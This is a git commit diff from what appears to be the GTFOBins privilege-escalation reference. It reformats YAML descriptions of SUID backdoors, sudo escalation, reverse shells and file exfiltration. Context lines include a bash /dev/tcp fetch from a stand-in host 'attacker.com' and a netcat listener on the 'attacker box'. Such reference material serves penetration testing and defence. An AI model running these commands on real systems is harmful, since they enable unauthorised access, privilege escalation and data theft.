Fix YAML literal blocks

This commit is contained in:
Andrea Cardaci 2018-06-01 12:40:05 +02:00
parent b96f6e9a49
commit 5a1c87e7c5
8 changed files with 58 additions and 21 deletions

View File

@ -1,55 +1,84 @@
execute-interactive: execute-interactive:
label: Interactive execute label: Interactive execute
description: It executes interactive commands that may be used to break out from restricted shells. description: |
It executes interactive commands that may be used to break out from
restricted shells.
execute-non-interactive: execute-non-interactive:
label: Non-interactive execute label: Non-interactive execute
description: It executes non-interactive commands that may be used to break out from restricted shells. description: |
It executes non-interactive commands that may be used to break out from
restricted shells.
suid-enabled: suid-enabled:
label: SUID label: SUID
description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems like Debian that allow to run a SUID shell by default. description: |
It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems
like Debian that allow to run a SUID shell by default.
suid-limited: suid-limited:
label: Limited SUID label: Limited SUID
description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. Running `/bin/sh` only works on Debian systems that allow SUID shell execution by default. description: |
It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. Running `/bin/sh` only works on Debian systems that allow
SUID shell execution by default.
sudo-enabled: sudo-enabled:
label: Sudo label: Sudo
description: It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on `sudo`. description: |
It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on `sudo`.
download: download:
label: Download label: Download
description: It can download remote files. description: |
It can download remote files.
upload: upload:
label: Upload label: Upload
description: It can exfiltrate files on the network. description: |
It can exfiltrate files on the network.
bind-shell-interactive: bind-shell-interactive:
label: Interactive bind shell label: Interactive bind shell
description: It can bind a shell to a local port to allow remote network access. description: |
It can bind a shell to a local port to allow remote network access.
reverse-shell-interactive: reverse-shell-interactive:
label: Interactive reverse shell label: Interactive reverse shell
description: It can send back a reverse shell to a listening attacker to open a remote network access. description: |
It can send back a reverse shell to a listening attacker to open a remote
network access.
bind-shell-non-interactive: bind-shell-non-interactive:
label: Non-interactive bind shell label: Non-interactive bind shell
description: It can bind a non-interactive shell to a local port to allow remote network access. description: |
It can bind a non-interactive shell to a local port to allow remote network
access.
reverse-shell-non-interactive: reverse-shell-non-interactive:
label: Non-interactive reverse shell label: Non-interactive reverse shell
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access. description: |
It can send back a non-interactive reverse shell to a listening attacker to
open a remote network access.
load-library: load-library:
label: Library load label: Library load
description: It loads shared libraries that may be used to run code in the binary execution context. description: |
It loads shared libraries that may be used to run code in the binary
execution context.
file-read: file-read:
label: File read label: File read
description: It reads files and may be used to do privileged reads or disclose files outside a restricted file system. description: |
It reads files and may be used to do privileged reads or disclose files
outside a restricted file system.
file-write: file-write:
label: File write label: File write
description: It writes files and may be used to do privileged writes or write files outside a restricted file system. description: |
It writes files and may be used to do privileged writes or write files
outside a restricted file system.

View File

@ -29,7 +29,7 @@ functions:
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
code: |- code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_get export LFILE=file_to_get

View File

@ -1,5 +1,7 @@
--- ---
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. description: |
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
what GTFBins binaries are supported. Here some example.
functions: functions:
execute-interactive: execute-interactive:
- code: busybox sh - code: busybox sh

View File

@ -1,6 +1,7 @@
--- ---
description: | description: |
`ld.so` is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with: `ld.so` is the Linux dynamic linker/loader, its filename and location might
change across distributions. The proper path is can be obtained with:
``` ```
$ strings /proc/self/exe | head -1 $ strings /proc/self/exe | head -1

View File

@ -1,5 +1,6 @@
--- ---
description: The read file content is corrupted by being sorted. description: |
The read file content is corrupted by being sorted.
functions: functions:
sudo-enabled: sudo-enabled:
- code: | - code: |

View File

@ -1,5 +1,6 @@
--- ---
description: It can only append data if the destination exists. description: |
It can only append data if the destination exists.
functions: functions:
sudo-enabled: sudo-enabled:
- code: | - code: |

View File

@ -1,5 +1,7 @@
--- ---
description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces. description: |
The read file content is corrupted by replacing occurrences of `$'\b_'` to
terminal sequences and by converting tabs to spaces.
functions: functions:
sudo-enabled: sudo-enabled:
- code: | - code: |

View File

@ -1,5 +1,6 @@
--- ---
description: The read file content is corrupted by squashing multiple adjacent lines. description: |
The read file content is corrupted by squashing multiple adjacent lines.
functions: functions:
sudo-enabled: sudo-enabled:
- code: | - code: |